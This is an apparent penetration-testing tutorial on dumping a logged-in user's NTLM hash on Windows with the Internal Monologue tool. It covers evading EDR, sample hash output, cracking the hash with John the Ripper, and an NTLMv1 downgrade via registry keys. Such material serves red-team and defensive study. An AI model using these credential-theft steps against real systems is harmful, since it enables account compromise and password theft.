Extracting NTLM Hashes With User Privileges

When an attacker has access to an endpoint, they typically extract cached account credentials, including NTLM hashes. This is often done using Mimikatz, or by dumping LSASS memory and processing the output on another system. Both of these techniques require Administrative privileges on the endpoint, which is not always easily attainable.

Due to the prevalence of Mimikatz, it’s also something that most endpoint detection and response agents are able to detect, in particular any foreign process attempting to interact with LSASS memory is often alerted on.

However, there is another way to extract NTLM credentials, Internal Monologue;

https://github.com/eladshamir/Internal-Monologue

The tool essentially creates a rogue authentication server running on the targets system. It then uses NTLMSSP to force authentication to server within the context of the current user, and as such allows retrieving the users hash. This is essentially a similar process to Responder but everything takes place on the victim host rather than requiring external communication.

The tool is fairly simple to use. Just download the visual studio project from Github, build the EXE file and run it without parameters to display the users NTLM hash;

C:\Users\user\Desktop>InternalMonologue.exe
user::DESKTOP-MGEJ709:1122334455667788:65a98c4f3f492225f6654883d5c84325:01010000000000006f4079d40519d701a9f138773b665b64000000000800300030000000000000000100000000200000b424c334836a4a13b18a154ed6220bd975e41965ba41ce0c59519682574a9d460a00100000000000000000000000000000000000090028004400450053004b0054004f0050002d004d00470045004a003700300039005c0075007300650072000000000000000000

John the Ripper can then be run against the hash to determine the accounts password;

└─$ john hash       
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 3 candidates buffered for the current salt, minimum 8 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
Password1        (user)
1g 0:00:00:00 DONE 2/3 (2021-03-14 19:00) 33.33g/s 602333p/s 602333c/s 602333C/s ilovegod..Peter
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

If the tool is executed from an administrative account, it also has the ability to perform an NTLMv1 downgrade attack by modifying the LMCompatibilityLevel, NTLMMinClientSec and RestrictSendingNTLMTraffic registry keys.

Since NTLMv1 hashes are significantly weaker than NTLM, this can reduce cracking time significantly. As rainbow tables are available for NTLMv1 they can normally be broken within 24 hours.